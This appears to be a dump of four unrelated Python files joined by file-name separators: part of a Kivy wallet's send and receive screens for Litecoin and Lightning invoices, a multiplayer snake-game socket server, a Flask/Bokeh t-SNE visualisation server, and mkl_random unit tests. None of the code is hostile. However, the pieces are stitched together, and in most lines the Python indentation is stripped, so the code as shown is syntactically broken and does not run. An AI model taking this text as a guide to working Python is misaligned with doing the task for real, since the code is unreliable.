history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
        # interpret as lightning URI
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
# interpret as BIP21 URI
else:
self.set_bip21(text)
def set_bip21(self, text: str):
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.app.show_info(_("Invoice is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(invoice) for invoice in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
item.update(self.get_card(invoice))
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice) -> Dict[str, Any]:
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
key = self.app.wallet.get_key_for_outgoing_invoice(item)
if is_lightning:
assert isinstance(item, LNInvoice)
address = item.rhash
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Litecoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
try:
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Litecoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
except InvoiceError as e:
self.app.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
amount_sat = invoice.get_amount_sat()
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.app.format_amount_and_units_with_fiat(amount_sat)) +'\n'
self.app.protected(msg, self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
coro = self.app.wallet.lnworker.pay_invoice(invoice.invoice, attempts=10)
fut = asyncio.run_coroutine_threadsafe(coro, self.app.network.asyncio_loop)
fut.result()
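                # the coroutine runs on the network's asyncio loop;
                # fut.result() blocks this worker thread until the payment completes or fails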
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
outputs = invoice.outputs
amount = sum(map(lambda x: x.value, outputs)) if not any(parse_max_spend(x.value) for x in outputs) else '!'
coins = self.app.wallet.get_spendable_coins(None)
make_tx = lambda rbf: self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, rbf=rbf)
on_pay = lambda tx: self.app.protected(_('Send payment?'), self.send_tx, (tx, invoice))
d = ConfirmTxDialog(self.app, amount=amount, make_tx=make_tx, on_pay=on_pay)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum_grlc.util import create_bip21_uri
amount = self.app.get_amount(self.amount)
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
lnworker = self.app.wallet.lnworker
try:
if lightning:
if lnworker:
key = lnworker.add_request(amount, message, self.expiry())
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
return
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
except InvoiceError as e:
self.app.show_error(_('Error creating payment request') + ':\n' + str(e))
return
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
else:
assert isinstance(req, LNInvoice)
address = req.invoice
key = self.app.wallet.get_key_for_receive_request(req)
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
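            # e.g. with n = 6 tabs and idx = 3 this gives (6 - 3 - 1) / (6 - 1) = 0.4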
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
        # set the carousel to load the appropriate slide,
        # saved in the slide attribute of the tab header
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
network.py
|
import socket
from common import constants as c
from common import settings
import json
import threading
from threading import Timer
import select
from common.game import game
import time
import sys
curr_snake_movements = {}
next_snake_id = 1
message_index = 1
time_step = 0
completed_steps = {} # time_step:1
snakes_last_timestamp = {}
snake_timers = {}
started = False
def start_server():
global started
threading.Thread(target=__listen_TCP).start()
print('Waiting for players to join...')
input('Press enter to start the game!\n')
print("Let's goooooo!!!!!")
started = True
msgPacket = {
"type": c.START_GAME,
}
__send_UDP(msgPacket)
i, j = game.get_coord_for_food()
__send_food_spawn(i, j)
def __listen_TCP():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((settings.MY_IP, c.PORT))
s.listen()
while 1:
conn, addr = s.accept()
threading.Thread(target=listen_connection, args=[
conn], daemon=True).start()
def listen_connection(conn):
with conn:
while True:
data = conn.recv(c.BUFFER_SIZE)
            if not data:
                # an empty read means the peer closed the connection; stop listening
                break
__handle_received_TCP(data)
def __handle_received_TCP(data: bytes):
try:
msgPacket = json.loads(data.decode('utf-8'))
if msgPacket['type'] == c.JOIN_REQUEST:
__handle_join_request(msgPacket)
elif msgPacket['type'] == c.LEAVE_REQUEST:
__handle_leave_request(msgPacket)
elif msgPacket['type'] == c.MOVE_REQUEST:
__handle_move_request(msgPacket)
except Exception as e:
print(e)
def __send_UDP(msgPacket: dict):
global message_index
msgPacket['msg_ind'] = message_index
message_index += 1
# print('SENT:', msgPacket)
msgPacketBytes = json.dumps(msgPacket).encode(encoding='utf-8')
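    # each packet is broadcast twice, presumably as a crude guard against UDP loss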
for _ in range(2):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
broadcast_str = '<broadcast>'
if settings.MY_IP.startswith('25.'):
broadcast_str = '25.255.255.255'
s.sendto(msgPacketBytes, (broadcast_str, c.PORT))
def __send_food_spawn(i: int, j: int):
msgPacket = {'type': c.FOOD_SPAWN, 'i': i, 'j': j}
__send_UDP(msgPacket)
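# Illustrative only: once __send_UDP has stamped the message index, the food-spawn
# broadcast is a JSON document along the lines of
#   {"type": <c.FOOD_SPAWN>, "i": 4, "j": 7, "msg_ind": 12}
# (the concrete tag value is defined in common.constants and not shown here).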
def __handle_join_request(msgPacket: dict):
if game.snake_count() >= c.PLAYER_LIMIT or started:
return
print('JOINED:', msgPacket)
global next_snake_id
head_i, head_j, i, j = game.get_coord_for_snake()
game.spawn_snake(snake_id=next_snake_id, snake_ip=msgPacket['ip'], name=msgPacket['name'], placement=[
(head_i, head_j), (i, j)])
next_snake_id += 1
msgPacket = {
"type": c.SNAKES,
"snakes": game.get_snakes_json(),
}
__send_UDP(msgPacket)
def __handle_leave_request(msgPacket: dict):
__remove_snake(msgPacket['id'])
def __handle_move_request(msgPacket: dict):
# Snake could be removed by snake_2_food
if game.snake_exists(msgPacket['id']):
if msgPacket['id'] in snake_timers:
snake_timers[msgPacket['id']].cancel()
snake_timers.pop(msgPacket['id'])
curr_snake_movements[msgPacket['id']] = msgPacket['dir']
__progress_if_available()
def __check_movement_diff(snake_id: int, curr_time: float):
# No movement in-between
if game.snake_exists(snake_id) and snakes_last_timestamp[snake_id] == curr_time:
print('LATENCY KICK:', str(snake_id))
__remove_snake(snake_id)
def __remove_snake(snake_id: int):
print('REMOVING SNAKE:', str(snake_id))
if game.snake_exists(snake_id):
game.remove_snake(snake_id)
if snake_id in curr_snake_movements:
curr_snake_movements.pop(snake_id)
if snake_id in snake_timers:
snake_timers[snake_id].cancel()
snake_timers.pop(snake_id)
msgPacket = {
"type": c.SNAKE_LEFT,
"id": snake_id
}
__send_UDP(msgPacket)
__progress_if_available()
def __progress_if_available():
if len(curr_snake_movements) == game.snake_count():
threading.Thread(target=__finalize_time_step, daemon=True).start()
def __finalize_time_step():
global time_step
for snake_id in curr_snake_movements.keys():
curr_time = time.time()
snakes_last_timestamp[snake_id] = curr_time
t = Timer(c.MAX_MOVEMENT_DIFF, __check_movement_diff,
args=[snake_id, curr_time])
snake_timers[snake_id] = t
t.start()
completed_steps[time_step] = 1
time_step += 1
game.apply_snake_movements([(int(id), dir)
for id, dir in curr_snake_movements.items()])
msgPacket = {'type': c.MOVEMENTS, 'movements': curr_snake_movements}
__send_UDP(msgPacket)
curr_snake_movements.clear()
food_deficit = max(0, game.snake_count() - game.food_count())
for _ in range(food_deficit):
i, j = game.get_coord_for_food()
game.spawn_food(coordinate=(i, j))
__send_food_spawn(i, j)
|
bokeh-server.py
|
import argparse
import keras.backend.tensorflow_backend as ktf
import numpy as np
import tensorflow as tf
from bokeh.embed import server_document
from bokeh.layouts import column, gridplot
from bokeh.models import ColumnDataSource, Slider
from bokeh.plotting import figure
from bokeh.sampledata.sea_surface_temperature import sea_surface_temperature
from bokeh.server.server import Server
from bokeh.themes import Theme
from flask import Flask, render_template
from keras import backend as K
from keras.layers import Input
from tornado.ioloop import IOLoop
from applications.config import get_spectralnet_config, get_siamese_config
from applications.plot_embedding import plot_embedding_bokeh
from core import networks
from core.data import load_spectral_data, load_siamese_data
# PARSE ARGUMENTS
from core.util import get_session
from sklearn import manifold
from core.data import get_common_data, load_base_data
from bokeh.layouts import column
from bokeh.models import Button, CustomJS
from bokeh.plotting import figure
# Example defined here: https://github.com/bokeh/bokeh/blob/1.3.4/examples/howto/server_embed/flask_embed.py
app = Flask(__name__)
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=str, help='gpu number to use', default='')
parser.add_argument('--gpu_memory_fraction', type=float, help='gpu percentage to use', default='0.8')
parser.add_argument('--dset', type=str, help='dataset to use', default='mnist')
args = parser.parse_args()
ktf.set_session(get_session(args.gpu_memory_fraction))
K.set_learning_phase(0)
params = get_spectralnet_config(args)
params['train_set_fraction'] = 0.8
data = load_spectral_data(params['data_path'], args.dset)
x_train, y_train, x_val, y_val, x_test, y_test = data['spectral']['train_and_test']
x_train_unlabeled, y_train_unlabeled, x_train_labeled, y_train_labeled = data['spectral'][
'train_unlabeled_and_labeled']
x_val_unlabeled, y_val_unlabeled, x_val_labeled, y_val_labeled = data['spectral']['val_unlabeled_and_labeled']
batch_sizes = {
'Unlabeled': x_train.shape[0],
'Labeled': x_train.shape[0],
'Orthonorm': x_train.shape[0],
}
input_shape = x_train.shape[1:]
inputs = {
'Unlabeled': Input(shape=input_shape, name='UnlabeledInput'),
'Labeled': Input(shape=input_shape, name='LabeledInput'),
'Orthonorm': Input(shape=input_shape, name='OrthonormInput'),
}
y_true = tf.placeholder(tf.float32, shape=(None, params['n_clusters']), name='y_true')
# Load Siamese network
if params['affinity'] == 'siamese':
siamese_input_shape = [params['n_clusters']]
siamese_inputs = {
'Unlabeled': Input(shape=siamese_input_shape, name='UnlabeledInput'),
'Labeled': Input(shape=siamese_input_shape, name='LabeledInput'),
}
siamese_net = networks.SiameseNet(siamese_inputs, params['arch'], params.get('siam_reg'), y_true,
params['siamese_model_path'])
else:
siamese_net = None
y_train, x_train, p_train, \
y_test, x_test, \
y_val, x_val, p_val, \
y_train_labeled, x_train_labeled, \
y_val_labeled, x_val_labeled, \
y_train_unlabeled, x_train_unlabeled, \
y_val_unlabeled, x_val_unlabeled, \
train_val_split = get_common_data(params, load_base_data(params, params['dset']))
def modify_doc(doc):
p1 = figure(x_axis_type="datetime", title="t-SNE embedding of the digits - original")
p1.xaxis.axis_label = 'x1'
p1.yaxis.axis_label = 'x2'
p1.legend.location = "top_left"
p2 = figure(x_axis_type="datetime", title="t-SNE embedding of the digits - siamese")
p2.xaxis.axis_label = 'x1'
p2.yaxis.axis_label = 'x2'
p2.legend.location = "top_left"
def callback(attr, old, sample_size):
x_test = x_val[:sample_size, :]
y_test = y_val[:sample_size]
x_affinity = siamese_net.predict(x_test, batch_sizes)
# ----------------------------------------------------------------------
# t-SNE embedding of the digits dataset
print("Computing t-SNE embeddings for sample size %s" % sample_size)
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
X_tsne = tsne.fit_transform(x_test)
plot_embedding_bokeh(X_tsne, y_test, p1)
X_affinity_tsne = tsne.fit_transform(x_affinity)
plot_embedding_bokeh(X_affinity_tsne, y_test, p2)
print("Finished Plotting for sample size %s" % sample_size)
b = Button(label="Reset", button_type="success", width=300)
b.js_on_click(CustomJS(args=dict(p1=p1, p2=p2), code="""
console.log("start CustomJS");
p1.reset.emit();
p2.reset.emit();
console.log("finish CustomJS");
"""))
default_sample_size = 100
slider = Slider(start=100, end=1000, value=default_sample_size, step=100, title="Sample Size")
slider.on_change('value', callback)
callback(None, None, default_sample_size)
grid = gridplot([[p1, p2]], plot_width=400, plot_height=400)
    doc.add_root(column(slider, grid, b))
doc.theme = Theme(filename="theme.yaml")
@app.route('/', methods=['GET'])
def bkapp_page():
script = server_document('http://localhost:5006/bkapp')
return render_template("embed.html", script=script, template="Flask")
def bk_worker():
# Can't pass num_procs > 1 in this configuration. If you need to run multiple
# processes, see e.g. flask_gunicorn_embed.py
server = Server({'/bkapp': modify_doc}, io_loop=IOLoop(), allow_websocket_origin=["127.0.0.1:8000"])
server.start()
server.io_loop.start()
from threading import Thread
Thread(target=bk_worker).start()
if __name__ == '__main__':
app.run(port=8000)
|
test_random.py
|
#!/usr/bin/env python
# Copyright (c) 2017-2019, Intel Corporation
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns, suppress_warnings)
import mkl_random as rnd
from numpy.compat import asbytes
import sys
import warnings
class TestSeed_Intel(TestCase):
def test_scalar(self):
evs_zero_seed = {
'MT19937' : 844, 'SFMT19937' : 857,
'WH' : 0, 'MT2203' : 890,
'MCG31' : 0, 'R250' : 229,
'MRG32K3A' : 0, 'MCG59' : 0 }
for brng_algo in evs_zero_seed:
s = rnd.RandomState(0, brng = brng_algo)
assert_equal(s.get_state()[0], brng_algo)
assert_equal(s.randint(1000), evs_zero_seed[brng_algo])
evs_max_seed = {
'MT19937' : 635, 'SFMT19937' : 25,
'WH' : 100, 'MT2203' : 527,
'MCG31' : 0, 'R250' : 229,
'MRG32K3A' : 961, 'MCG59' : 0 }
for brng_algo in evs_max_seed:
s = rnd.RandomState(4294967295, brng = brng_algo)
assert_equal(s.get_state()[0], brng_algo)
assert_equal(s.randint(1000), evs_max_seed[brng_algo])
def test_array(self):
s = rnd.RandomState(range(10), brng='MT19937')
assert_equal(s.randint(1000), 410)
s = rnd.RandomState(np.arange(10), brng='MT19937')
assert_equal(s.randint(1000), 410)
s = rnd.RandomState([0], brng='MT19937')
assert_equal(s.randint(1000), 844)
s = rnd.RandomState([4294967295], brng='MT19937')
assert_equal(s.randint(1000), 635)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integers
assert_raises(TypeError, rnd.RandomState, -0.5)
assert_raises(ValueError, rnd.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integers
assert_raises(TypeError, rnd.RandomState, [-0.5])
assert_raises(ValueError, rnd.RandomState, [-1])
assert_raises(ValueError, rnd.RandomState, [4294967296])
assert_raises(ValueError, rnd.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, rnd.RandomState, [1, -2, 4294967296])
def test_non_deterministic(self):
rs = rnd.RandomState(brng='nondeterministic')
rs.rand(10)
rs.randint(0, 10)
class TestBinomial_Intel(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(rnd.binomial(0, p) == 0)
np.testing.assert_array_equal(rnd.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, rnd.binomial, 1, np.nan)
class TestMultinomial_Intel(TestCase):
def test_basic(self):
rnd.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
rnd.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= rnd.randint(-5, -1) < -1)
x = rnd.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(rnd.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(rnd.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(rnd.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, rnd.multinomial, 1, p,
np.float(1))
class TestSetState_Intel(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = rnd.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
if len(self.state) == 5:
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint_Intel(TestCase):
rfunc = rnd.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_in_bounds_fuzz(self):
# Don't use fixed seed
rnd.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
        # We use an md5 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but np.bool, where the range
        # is [0, 2). Hashes are for little-endian numbers.
tgt = {'bool': '4fee98a6885457da67c39331a9ec336f',
'int16': '80a5ff69c315ab6f80b03da1d570b656',
'int32': '15a3c379b6c7b0f296b162194eab68bc',
'int64': 'ea9875f9334c2775b00d4976b85a1458',
'int8': '0f56333af47de94930c799806158a274',
'uint16': '80a5ff69c315ab6f80b03da1d570b656',
'uint32': '15a3c379b6c7b0f296b162194eab68bc',
'uint64': 'ea9875f9334c2775b00d4976b85a1458',
'uint8': '0f56333af47de94930c799806158a274'}
for dt in self.itype[1:]:
rnd.seed(1234, brng='MT19937')
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
print("")
assert_(tgt[np.dtype(dt).name] == res)
        # bools do not depend on endianness
rnd.seed(1234, brng='MT19937')
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
